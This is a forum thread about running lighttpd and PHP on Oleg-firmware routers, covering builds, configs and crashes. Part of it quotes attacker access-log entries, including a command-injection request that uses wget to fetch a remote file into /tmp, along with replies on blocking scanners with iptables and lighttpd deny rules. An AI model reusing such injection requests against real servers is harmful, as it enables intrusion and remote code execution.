as it's not in the repository, you'll need to compile it on your own and give it a try
good luck
Printable View
as it's not in the repository, you'll need to compile it on your own and give it a try
good luck
Thanks, glad it works:)
mysql5 is available in ipkg, it was not working 100% properly with php when I tried it however. The database itself works, but the mysql modules for php are not working. I think you have to recompile those to work with the new mysql.
you should be able to install it with ipkg install mysql5
I remember a russian thread about this as well, I'm not sure if they made it working however:D
for php, you have to recompile it yourself. to compile php is not really an issue, but you might run into dependency issues.
So if possible, I recommend to find something that does work with mysql4 :p
Thanks for quick replies!
I'd like to install the Bug Genie tool: http://thebuggenie.com/index.php
As requirements say (http://issues.thebuggenie.com/wiki/TheBugGenie%3AFAQ), php 5.3 is a requirement, so probably I won't be able to do anything about it but to get 5.3.+ version running. As I have noticed, the Bug Genie tool works also with PostgreSQL version 8.2.+, and the one included in the ipkg should confirm to this requirement. So the only problem here is a PHP requirement.
As I said before, I am not very skilled in UNIX systems (I have never compiled anything yet ;)) so I am not sure if I will be able to get this working correctly. Therefore I'd really like to find a walkthrough that would guide me through entire process ... Do you know about some tutorial that would help me?
One more question, is it possible that someone unix-compile-skilled would compile the php 5.3.+ and somehow provide me a copy of it so that I could easily set it up on my machine?
Thanks in advance for replies and help ...
matt
Well... if they are small programs I'd compile them for you, but php is just too big to spend my spare time on.
postgresql is v8.2 in ipkg: http://ipkg.nslu2-linux.org/feeds/op...3-2_mipsel.ipk
I'd say, try it with that and php 5.2
if it doesn't work, I'm afraid I can't help you much apart from referring you to the part of compiling Eaccelerator. if you've installed those packages you might have a chance it's good enough to compile php with.
grab the sources of php, and read up on the ./configure parameters and try it out.
as I said, it's probably going to be a tricky thing to actually do. compiling it with the crosscompiler is also somewhat of a hell last time I tried to do something similar.:rolleyes:
I want to note that lighttpd 1.4.30-1 crashes with a segmentation fault when using ssl:(
and is it just me or is that mailinglist not very active?:p
Will see if/when OpenWRT package being updated.
I haven't been able to discover what is going wrong... I followed the lighttpd wiki and took note of the changes in the new version: http://www.lighttpd.net/2011/12/18/1...sent-this-year
in the mean time I've compiled v1.4.29 myself to have ssl working again.
I've upgraded to lighttpd_1.4.30-1_mipsel.ipk and now each time a client connects to the server, the lighttpd process dies.
Anyone else faces this problem?
for 1.4.30 disabling the ssl engine should work.
it's not the official one, I had to compile it myself, and everything works again (as far as I'm aware).
mind that these are binaries only. By simply overwriting the 1.4.30 ones should work.
Code:/opt/etc/init.d/S80lighttpd stop
cd /opt
wget http://wpte.kicks-ass.net/downloads/Oleg%20Firmware/Compiled%20software%20native/lighttpd-1.4.29.tar.bz2
tar -jxvf lighttpd-1.4.29.tar.bz2
rm lighttpd-1.4.29.tar.bz2
/opt/etc/init.d/S80lighttpd start
thank you. will try it.
Hello to all in this forum. And thank you for your good work so I have been able to put up a webserver. But obviously I did register, because I have a question. :) And here it comes:
I have been getting these attemps to my IP
What are these?Code:210.34.10.68 - - [15/Dec/2011:03:00:41 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
188.165.247.215 - - [15/Dec/2011:07:06:40 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
67.228.187.116 - - [15/Dec/2011:09:06:21 +0200] "HEAD / HTTP/1.0" 302 0 "-" "-"
And these are somekind of hacking attemps, right?
How dangerous are these? Can I block them somehow?Code:125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 345 "-" "ZmEu"
125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:49 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
125.88.75.199 **.**.***.*** - [15/Dec/2011:18:11:55 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 345 "-" "ZmEu"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /cse/pmwiki.php HTTP/1.1" 200 418 "-" "-"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /info/pmwiki.php HTTP/1.1" 200 419 "-" "-"
193.85.145.195 **.**.***.*** - [17/Dec/2011:13:37:54 +0200] "GET /infowiki/pmwiki.php HTTP/1.1" 200 423 "-" "-"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:35 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 586 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/cgi-bin.txt%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 583 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
188.138.11.56 **.**.***.*** - [25/Dec/2011:02:22:36 +0200] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20http://freetunel.com/cgi-bin.txt HTTP/1.1" 200 547 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
And what the f**k is this?
I made my site SSL, thanks to wpte for instructions in this thread, blocked port 80 and after that I have get only couple attemps:Code:61.250.80.133 **.**.***.*** - [21/Dec/2011:23:56:42 +0200] "GET /user/soapCaller.bs HTTP/1.1" 200 445 "-" "Morfeus Fucking Scanner"
Are these two same category than those above?Code:113.142.1.249 **.**.***.*** - [06/Jan/2012:11:01:34 +0200] "GET /admin/config.php HTTP/1.1" 200 436 "-" "Python-urllib/2.4"
94.24.41.200 **.**.***.*** - [08/Jan/2012:13:11:16 +0200] "GET /admin/cdr/counter.txt HTTP/1.1" 200 422 "-" "-"
I want to open port 80 again, because google translate dosn't work on https. Can I forward from another port somehow? Earlier tried port 8081 and my PHP Fusion site didn't work (cookies?). So I'm asking is there something I can do those attemps?
I observe similar queries in logs of my web-server too (I have lighttpd+mysql running small forum on top of RT-N16).
Someone is scanning internet looking for admin pages of typical services and other common vulnerabilities exposed to internet. That's pretty common and there's no good way to block them (at least I don't know any).
I wouldn't worry about them unless you found something relevant to your web site (like multiple strange requests to some script).
Its hard to block scanners like that trough iptables, you would need different software for that.
What you can do is chroot your website directory, you have several how-to's on the internet for that sort of stuff.
Even if they get in, they won't be able to access the router completely, just the webpages.
I do agree that you have to watch out these days, so many pages are being injected with weird stuff... damn hackers with their botnets:(
Yes. But if someone scans my router several times, i block them that way:
Code:$ cat /tmp/local/sbin/post-firewall
#!/bin/sh
...
for banned_ip in `cat /tmp/local/sbin/banned_ips.txt`;
do
iptables -I INPUT -s $banned_ip -j DROP
done
Its ugly way, i know, but some scanners are really annoying.Code:$ cat /tmp/local/sbin/banned_ips.txt
109.230.220.35
109.230.251.94
109.236.81.56
111.228.1.5
116.255.163.100
118.129.154.165
119.188.7.161
...
Will that blocking thing slow down webserver? Becaus I think they use everytime different IP, and that banned_ips.txt file will get long after some time.
And what is a good way to follow access and error.log files? I made them to rotate like system log, and sended to my email as text. But email breaks those access log lines so that's hard to follow it.
iptables will block anything from that ip... it's on a low level, but yes it will slow down your system slightly. Probably it won't be noticable tho.
I'm actually working on getting snort installed and working: http://www.snort.org/
not sure how fast it is so far... but I have the idea that it's too heavy:D
snort is able to detect illegal attempts and able to block it:)
Well, you can use my ban list as well as the script (iptables) from here: http://wl500g.info/showthread.php?t=27852
it should be up to date....and I suggest to have a closer look to my avoid brute force script, scanners are detected and blocked for a complete day by iptables.
I have not recognized that anything is slow on my rtn when using this blocklist.
Further, there are several ways how I control my webserver.
When needed, I can help you to adapt my avbf2_6 script for gateway-usage.
Just translate by google - and no worry - someone will guide you when any problem occurs.
HTH
Have fun
newbiefan
EDIT:
Ah, I forgot: a good starting point to block Scanners and Script-Kiddies is to use url.access-deny capabilities of your lighttpd. Configure your lighty.conf to block scanners like ZmEU or Morpheus fucking scanner or without any agent aso....
Here you have a sample config to do so: http://pastebin.com/PQuMbF3Y
I have a problem with lighttpd. It didn't start automaticaly so I tried forcing it to start but it says that i havn't got config file :
So i tried attaching it, but there is an error in my config...Quote:
[admin@WL-0026189D2E8C root]$ lighttpd
2012-05-14 15:51:07: (server.c.595) No configuration available. Try using -f option.
I attach my lighttpd.conf. Can someone help me with this? I have WL-500gp v2 and Olegs 1.9.2.7-10.Quote:
[admin@WL-0026189D2E8C root]$ lighttpd -f /opt/etc/lighttpd/lighttpd.conf
2012-05-14 15:57:08: (configfile.c.943) source: /opt/etc/lighttpd/lighttpd.conf line: 97 pos: 19 parser failed somehow near here: (EOL)
[admin@WL-0026189D2E8C root]$
Attachment 8940
there are several line-breaks that weren't commented out (e.g. lines 92, 102, 127...)
or is that a copy-paste fault?
good luck
You are right! I corrected it, assigned config file and I'm not sure if it is already working. I've got this process :
Is 237 lighttpd working or just config file? Also when i type my ip in browser i should see my website but it doesn't load. At http://192.168.1.1:8080/ I see some kind of php configuration.Quote:
237 ? S 0:00 lighttpd -f /opt/etc/lighttpd/lighttpd.conf
238 ? Ss 0:01 /opt/bin/php-fcgi
240 ? S 0:00 /opt/bin/php-fcgi
Now when i try to start lighttpd
How to make my website working? I Attach my corrected Attachment 8941.Quote:
[admin@WL-0026189D2E8C root]$ /opt/etc/init.d/S80lighttpd start
Starting web server: lighttpd :
2012-05-14 18:55:06: (network.c.371) can't bind to port: 8080 Address already in use
[admin@WL-0026189D2E8C root]$
You're right again!
It was my index.php ;)
Quote:
<?php
phpinfo();
?>
Last night, I reconstructed this how-to on my Entware device.
Now I want to share my experiences. :)
As lighttpd now is more modular you additionally have to
afterwards you need to modify lighttpd.conf:Code:opkg install lighttpd-mod-fastcgi
server.modules now needs to contain that mod_fastcgi:
also uncomment that section about the module and keep an eye at the bin-path:Code:server.modules = (
# "mod_rewrite",
# "mod_redirect",
# "mod_alias",
# "mod_auth",
# "mod_status",
# "mod_setenv",
"mod_fastcgi"
# "mod_proxy",
# "mod_simple_vhost",
# "mod_cgi",
# "mod_ssi",
# "mod_usertrack",
# "mod_expire",
# "mod_webdav"
)
the php part of the howto is valid for entware, beside the new package-names (php -> php5.. etc) and a tiny typo in the eaccelator.ini:Code:#### fastcgi module
## read fastcgi.txt for more info
fastcgi.server = (
".php" => (
"localhost" => (
"socket" => "/opt/tmp/php-fastcgi.socket",
"bin-path" => "/opt/bin/php-fcgi"
)
)
)
http://code.google.com/p/wl500g-repo...s/detail?id=15
I did not install mysql, as I don't need it right now. I'm kind of sure that there is no problem.
Have fun!
wow good news gm!;)
I've only shortly tried entware out a bit, but at that time it wasn't suitable for my needs :p
it looks a lot better when it comes to the amount of packages, so I might give it a try again someday soon:D
As I have a rather old version of the oleg-firmware, i updated my php, lighttpd installations.
But now, the php is not able to connect to magickwand...
It seems, that the older version of php, had the magickwand/imagemagick functions inbuilt and not dynamicly linked.. (because the imagemagick doesnt provide any of the magickwand functions)
Who is that person, who updates the packages here: http://ipkg.nslu2-linux.org/feeds/op.../cross/stable/
Because now, it is UNUSABLE!!!!
Even "phpinfo" is not working anymore... So thanks for updating the php and stuff and turning it into completly useless trash..
You will get such wonderful entries in the log:
And you see "503 - service not available" or "site not found" in the browser..Quote:
2012-06-04 11:01:29: (mod_fastcgi.c.2676) FastCGI-stderr: PHP Fatal error: Call to undefined function NewMagickWand() in test.php on line 2
When i added the extensions dir in the php.ini from the first post, i got this errors now (when calling phpinfo)
PS: I will never ever update anything again..Quote:
2012-06-04 11:29:22: (mod_fastcgi.c.2543) unexpected end-of-file (perhaps the fastcgi process died): pid: 10344 socket: tcp:127.0.0.1:1025
2012-06-04 11:29:22: (mod_fastcgi.c.3286) child signaled: 11
2012-06-04 11:29:22: (mod_fastcgi.c.3329) response not received, request sent: 981 on socket: tcp:127.0.0.1:1025 for /test.php?, closing connection
Edit2:
When i start php-fcgi in shell, i get this log:
Which package delivers this extension?!?!Quote:
PHP Warning: PHP Startup: Unable to load dynamic library '/opt/lib/php/extensions/magickwand.so' - File not found in Unknown on line 0
Thanks for the mirror, but you dont have the old php-packages..
I tried to compile imagemagick for the router, but it didnt work..
Try to compile php-5.3 now! Lets see what will happen :D